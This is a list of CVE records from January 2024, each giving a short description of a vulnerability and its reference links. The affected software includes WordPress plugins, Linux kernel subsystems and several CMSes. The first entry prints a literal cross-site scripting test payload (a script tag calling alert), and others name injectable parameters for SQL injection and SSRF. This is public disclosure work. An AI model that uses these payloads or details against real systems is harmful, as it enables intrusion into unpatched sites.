CVE 2024 650 Candidate A vulnerability was found in Project Worlds Visitor Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file dataset.php of the component URL Handler. The manipulation of the argument name with the input "><script>alert('torada')</script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251376. MISC:https://torada.notion.site/XSS-at-datatest-php-660aabd1437d4df7a492d19a461a1f3c?pvs=4 | URL:https://torada.notion.site/XSS-at-datatest-php-660aabd1437d4df7a492d19a461a1f3c?pvs=4 | MISC:https://vuldb.com/?ctiid.251376 | URL:https://vuldb.com/?ctiid.251376 | MISC:https://vuldb.com/?id.251376 | URL:https://vuldb.com/?id.251376 Assigned (20240117)
CVE 2024 649 Candidate A vulnerability was found in ZhiHuiYun up to 4.4.13 and classified as critical. This issue affects the function download_network_image of the file /app/Http/Controllers/ImageController.php of the component Search. The manipulation of the argument url leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251375. MISC:https://note.zhaoj.in/share/jC6NMe5TRSys | URL:https://note.zhaoj.in/share/jC6NMe5TRSys | MISC:https://vuldb.com/?ctiid.251375 | URL:https://vuldb.com/?ctiid.251375 | MISC:https://vuldb.com/?id.251375 | URL:https://vuldb.com/?id.251375 Assigned (20240117)
CVE 2024 648 Candidate A vulnerability has been found in Yunyou CMS up to 2.2.6 and classified as critical. This vulnerability affects unknown code of the file /app/index/controller/Common.php. The manipulation of the argument templateFile leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251374 is the identifier assigned to this vulnerability. MISC:https://note.zhaoj.in/share/FO8AL78oAeTS | URL:https://note.zhaoj.in/share/FO8AL78oAeTS | MISC:https://vuldb.com/?ctiid.251374 | URL:https://vuldb.com/?ctiid.251374 | MISC:https://vuldb.com/?id.251374 | URL:https://vuldb.com/?id.251374 Assigned (20240117)
CVE 2024 647 Candidate A vulnerability, which was classified as problematic, was found in Sparksuite SimpleMDE up to 1.11.2. This affects an unknown part of the component iFrame Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251373 was assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.251373 | URL:https://vuldb.com/?ctiid.251373 | MISC:https://vuldb.com/?id.251373 | URL:https://vuldb.com/?id.251373 | MISC:https://www.youtube.com/watch?v=KtDjoJlrpAc | URL:https://www.youtube.com/watch?v=KtDjoJlrpAc Assigned (20240117)
CVE 2024 646 Candidate An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system. MISC:RHBZ#2253908 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2253908 | MISC:RHSA-2024:0723 | URL:https://access.redhat.com/errata/RHSA-2024:0723 | MISC:RHSA-2024:0724 | URL:https://access.redhat.com/errata/RHSA-2024:0724 | MISC:RHSA-2024:0725 | URL:https://access.redhat.com/errata/RHSA-2024:0725 | MISC:RHSA-2024:0850 | URL:https://access.redhat.com/errata/RHSA-2024:0850 | MISC:RHSA-2024:0851 | URL:https://access.redhat.com/errata/RHSA-2024:0851 | MISC:RHSA-2024:0876 | URL:https://access.redhat.com/errata/RHSA-2024:0876 | MISC:RHSA-2024:0881 | URL:https://access.redhat.com/errata/RHSA-2024:0881 | MISC:RHSA-2024:0897 | URL:https://access.redhat.com/errata/RHSA-2024:0897 | MISC:RHSA-2024:1248 | URL:https://access.redhat.com/errata/RHSA-2024:1248 | MISC:RHSA-2024:1250 | URL:https://access.redhat.com/errata/RHSA-2024:1250 | MISC:RHSA-2024:1251 | URL:https://access.redhat.com/errata/RHSA-2024:1251 | MISC:RHSA-2024:1253 | URL:https://access.redhat.com/errata/RHSA-2024:1253 | MISC:RHSA-2024:1268 | URL:https://access.redhat.com/errata/RHSA-2024:1268 | MISC:RHSA-2024:1269 | URL:https://access.redhat.com/errata/RHSA-2024:1269 | MISC:RHSA-2024:1278 | URL:https://access.redhat.com/errata/RHSA-2024:1278 | MISC:RHSA-2024:1306 | URL:https://access.redhat.com/errata/RHSA-2024:1306 | MISC:RHSA-2024:1367 | URL:https://access.redhat.com/errata/RHSA-2024:1367 | MISC:RHSA-2024:1368 | URL:https://access.redhat.com/errata/RHSA-2024:1368 | MISC:RHSA-2024:1377 | URL:https://access.redhat.com/errata/RHSA-2024:1377 | MISC:RHSA-2024:1382 | URL:https://access.redhat.com/errata/RHSA-2024:1382 | MISC:RHSA-2024:1404 | URL:https://access.redhat.com/errata/RHSA-2024:1404 | MISC:https://access.redhat.com/security/cve/CVE-2024-0646 | URL:https://access.redhat.com/security/cve/CVE-2024-0646 | MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267 | URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267 Assigned (20240117)
CVE 2024 645 Candidate Buffer overflow vulnerability in Explorer++ affecting version 1.3.5.531. A local attacker could execute arbitrary code via a long filename argument by monitoring Structured Exception Handler (SEH) records. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-explorer | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-explorer Assigned (20240117)
CVE 2024 643 Candidate Unrestricted upload of dangerous file types in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to upload different file extensions without any restrictions, resulting in a full system compromise. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products Assigned (20240117)
CVE 2024 642 Candidate Inadequate access control in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to access the application as an administrator user through the application endpoint, due to lack of proper credential management. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products Assigned (20240117)
CVE 2024 641 Candidate A denial of service vulnerability was found in tipc_crypto_key_revoke in net/tipc/crypto.c in the Linux kernel’s TIPC subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system. MISC:RHBZ#2258757 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258757 | MISC:https://access.redhat.com/security/cve/CVE-2024-0641 | URL:https://access.redhat.com/security/cve/CVE-2024-0641 | MISC:https://github.com/torvalds/linux/commit/08e50cf071847323414df0835109b6f3560d44f5 | URL:https://github.com/torvalds/linux/commit/08e50cf071847323414df0835109b6f3560d44f5 Assigned (20240117)
CVE 2024 639 Candidate A denial of service vulnerability due to a deadlock was found in sctp_auto_asconf_init in net/sctp/socket.c in the Linux kernel’s SCTP subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system. MISC:RHBZ#2258754 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258754 | MISC:https://access.redhat.com/security/cve/CVE-2024-0639 | URL:https://access.redhat.com/security/cve/CVE-2024-0639 | MISC:https://github.com/torvalds/linux/commit/6feb37b3b06e9049e20dcf7e23998f92c9c5be9a | URL:https://github.com/torvalds/linux/commit/6feb37b3b06e9049e20dcf7e23998f92c9c5be9a Assigned (20240117)
CVE 2024 638 Candidate Least privilege violation in the Checkmk agent plugins mk_oracle, mk_oracle.ps1, and mk_oracle_crs before Checkmk 2.3.0b4 (beta), 2.2.0p24, 2.1.0p41 and 2.0.0 (EOL) allows local users to escalate privileges. MISC:https://checkmk.com/werk/16232 | URL:https://checkmk.com/werk/16232 Assigned (20240117)
CVE 2024 631 Candidate The Duitku Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the check_duitku_response function in all versions up to, and including, 2.11.4. This makes it possible for unauthenticated attackers to change the payment status of orders to failed. MISC:https://plugins.trac.wordpress.org/browser/duitku-social-payment-gateway/trunk/woocommerce-gateway-duitku.php#L409 | URL:https://plugins.trac.wordpress.org/browser/duitku-social-payment-gateway/trunk/woocommerce-gateway-duitku.php#L409 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve Assigned (20240116)
CVE 2024 630 Candidate The WP RSS Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the RSS feed source in all versions up to, and including, 4.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/changeset/3026269/wp-rss-aggregator | URL:https://plugins.trac.wordpress.org/changeset/3026269/wp-rss-aggregator | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve Assigned (20240116)
CVE 2024 628 Candidate The WP RSS Aggregator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.23.5 via the RSS feed source in admin settings. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. MISC:https://plugins.trac.wordpress.org/changeset/3029525/wp-rss-aggregator | URL:https://plugins.trac.wordpress.org/changeset/3029525/wp-rss-aggregator | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2154383e-eabb-4964-8991-423dd68d5efb?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2154383e-eabb-4964-8991-423dd68d5efb?source=cve Assigned (20240116)
CVE 2024 625 Candidate The WPFront Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wpfront-notification-bar-options[custom_class]’ parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/browser/wpfront-notification-bar/trunk/templates/template-wpfront-notification-bar.php#L94 | URL:https://plugins.trac.wordpress.org/browser/wpfront-notification-bar/trunk/templates/template-wpfront-notification-bar.php#L94 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve Assigned (20240116)
CVE 2024 624 Candidate The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/paid-memberships-pro/trunk/includes/services.php#L139 | URL:https://plugins.trac.wordpress.org/browser/paid-memberships-pro/trunk/includes/services.php#L139 | MISC:https://plugins.trac.wordpress.org/changeset/3025164/paid-memberships-pro/tags/2.12.8/includes/services.php | URL:https://plugins.trac.wordpress.org/changeset/3025164/paid-memberships-pro/tags/2.12.8/includes/services.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve Assigned (20240116)
CVE 2024 623 Candidate The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve Assigned (20240116)
CVE 2024 622 Candidate Local privilege escalation vulnerability affects OpenText Operations Agent product versions 12.15 and 12.20-12.25 when installed on Non-Windows platforms. The vulnerability could allow local privilege escalation. MISC:https://portal.microfocus.com/s/article/KM000026555?language=en_US | URL:https://portal.microfocus.com/s/article/KM000026555?language=en_US Assigned (20240116)
CVE 2024 621 Candidate The Simple Share Buttons Adder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 8.4.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/changeset/3032350/ | URL:https://plugins.trac.wordpress.org/changeset/3032350/ | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve Assigned (20240116)
CVE 2024 620 Candidate The PPWP – Password Protect Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.9 via API. This makes it possible for unauthenticated attackers to obtain post titles, IDs, slugs as well as other information including for password-protected posts. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve Assigned (20240116)
CVE 2024 618 Candidate The Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported form titles in all versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://advisory.abay.sh/cve-2024-0618/ | URL:https://advisory.abay.sh/cve-2024-0618/ | MISC:https://plugins.trac.wordpress.org/changeset/3022938/fluentform/tags/5.1.7/app/Helpers/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php | URL:https://plugins.trac.wordpress.org/changeset/3022938/fluentform/tags/5.1.7/app/Helpers/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0348d465-f351-4c52-b293-8b3b058292b9?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0348d465-f351-4c52-b293-8b3b058292b9?source=cve Assigned (20240116)
CVE 2024 617 Candidate The Category Discount Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpcd_save_discount() function in all versions up to, and including, 4.12. This makes it possible for unauthenticated attackers to modify product category discounts that could lead to loss of revenue. MISC:https://plugins.trac.wordpress.org/browser/woo-product-category-discount/trunk/cd-admin.php#L171 | URL:https://plugins.trac.wordpress.org/browser/woo-product-category-discount/trunk/cd-admin.php#L171 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve Assigned (20240116)
CVE 2024 616 Candidate The Passster – Password Protect Pages and Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.6.2 via API. This makes it possible for unauthenticated attackers to obtain post titles, slugs, IDs, content and other metadata including passwords of password-protected posts and pages. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/00b81467-8d00-4816-895a-89d67c541c17?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/00b81467-8d00-4816-895a-89d67c541c17?source=cve Assigned (20240116)
CVE 2024 614 Candidate The Events Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.4.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://advisory.abay.sh/cve-2024-0614 | URL:https://advisory.abay.sh/cve-2024-0614 | MISC:https://plugins.trac.wordpress.org/changeset/3042128/events-manager/trunk/admin/em-options.php?old=2769385&old_path=events-manager/trunk/admin/em-options.php | URL:https://plugins.trac.wordpress.org/changeset/3042128/events-manager/trunk/admin/em-options.php?old=2769385&old_path=events-manager/trunk/admin/em-options.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6288fddf-926f-4506-94de-696e0a23766d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6288fddf-926f-4506-94de-696e0a23766d?source=cve Assigned (20240116)
CVE 2024 612 Candidate The Content Views – Post Grid, Slider, Accordion (Gutenberg Blocks and Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/changeset/3024861/ | URL:https://plugins.trac.wordpress.org/changeset/3024861/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve Assigned (20240116)
CVE 2024 611 Candidate The Master Slider – Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the slides callback functionality in all versions up to, and including, 3.9.5. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://advisory.abay.sh/cve-2024-0611 | URL:https://advisory.abay.sh/cve-2024-0611 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve Assigned (20240116)
CVE 2024 610 Candidate The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'MerchantReference' parameter in all versions up to, and including, 1.6.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f17c4748-2a95-495c-ad3b-86b272855791?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f17c4748-2a95-495c-ad3b-86b272855791?source=cve Assigned (20240116)
CVE 2024 607 Candidate A flaw was found in the Netfilter subsystem in the Linux kernel. The issue is in the nft_byteorder_eval() function, where the code iterates through a loop and writes to the `dst` array. On each iteration, 8 bytes are written, but `dst` is an array of u32, so each element only has space for 4 bytes. That means every iteration overwrites part of the previous element corrupting this array of u32. This flaw allows a local user to cause a denial of service or potentially break NetFilter functionality. MISC:RHBZ#2258635 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258635 | MISC:https://access.redhat.com/security/cve/CVE-2024-0607 | URL:https://access.redhat.com/security/cve/CVE-2024-0607 | MISC:https://github.com/torvalds/linux/commit/c301f0981fdd3fd1ffac6836b423c4d7a8e0eb63 | URL:https://github.com/torvalds/linux/commit/c301f0981fdd3fd1ffac6836b423c4d7a8e0eb63 Assigned (20240116)
CVE 2024 606 Candidate An attacker could execute unauthorized script on a legitimate site through UXSS using window.open() by opening a javascript URI leading to unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1855030 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1855030 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-03/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-03/ Assigned (20240116)
CVE 2024 605 Candidate Using a javascript: URI with a setTimeout race condition, an attacker can execute unauthorized scripts on top origin sites in urlbar. This bypasses security measures, potentially leading to arbitrary code execution or unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1855575 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1855575 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-03/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-03/ Assigned (20240116)
CVE 2024 604 Candidate The Best WordPress Gallery Plugin – FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://advisory.abay.sh/cve-2024-0604 | URL:https://advisory.abay.sh/cve-2024-0604 | MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve Assigned (20240116)
CVE 2024 603 Candidate A vulnerability classified as critical has been found in ZhiCms up to 4.0. This affects an unknown part of the file app/plug/controller/giftcontroller.php. The manipulation of the argument mylike leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250839. MISC:https://note.zhaoj.in/share/n3QsNbORUR0e | URL:https://note.zhaoj.in/share/n3QsNbORUR0e | MISC:https://vuldb.com/?ctiid.250839 | URL:https://vuldb.com/?ctiid.250839 | MISC:https://vuldb.com/?id.250839 | URL:https://vuldb.com/?id.250839 Assigned (20240116)
CVE 2024 602 Candidate The YARPP – Yet Another Related Posts Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.30.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://advisory.abay.sh/cve-2024-0602 | URL:https://advisory.abay.sh/cve-2024-0602 | MISC:https://plugins.trac.wordpress.org/changeset/3037032/yet-another-related-posts-plugin/tags/5.30.10/includes/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin/tags/5.30.9/includes/yarpp_options.php | URL:https://plugins.trac.wordpress.org/changeset/3037032/yet-another-related-posts-plugin/tags/5.30.10/includes/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin/tags/5.30.9/includes/yarpp_options.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve Assigned (20240116)
CVE 2024 601 Candidate A vulnerability was found in ZhongFuCheng3y Austin 1.0. It has been rated as critical. Affected by this issue is the function getRemoteUrl2File of the file src\main\java\com\java3y\austin\support\utils\AustinFileUtils.java of the component Email Message Template Handler. The manipulation leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250838 is the identifier assigned to this vulnerability. MISC:https://github.com/biantaibao/Austin_SSRF/blob/main/SSRF.md | URL:https://github.com/biantaibao/Austin_SSRF/blob/main/SSRF.md | MISC:https://vuldb.com/?ctiid.250838 | URL:https://vuldb.com/?ctiid.250838 | MISC:https://vuldb.com/?id.250838 | URL:https://vuldb.com/?id.250838 Assigned (20240116)
CVE 2024 599 Candidate A vulnerability was found in Jspxcms 10.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file src\main\java\com\jspxcms\core\web\back\InfoController.java of the component Document Management Page. The manipulation of the argument title leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250837 was assigned to this vulnerability. MISC:https://github.com/sweatxi/BugHub/blob/main/Jspxcms.pdf | URL:https://github.com/sweatxi/BugHub/blob/main/Jspxcms.pdf | MISC:https://vuldb.com/?ctiid.250837 | URL:https://vuldb.com/?ctiid.250837 | MISC:https://vuldb.com/?id.250837 | URL:https://vuldb.com/?id.250837 Assigned (20240116)
CVE 2024 597 Candidate The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 12.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/changeset/3023398/ | URL:https://plugins.trac.wordpress.org/changeset/3023398/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve Assigned (20240116)
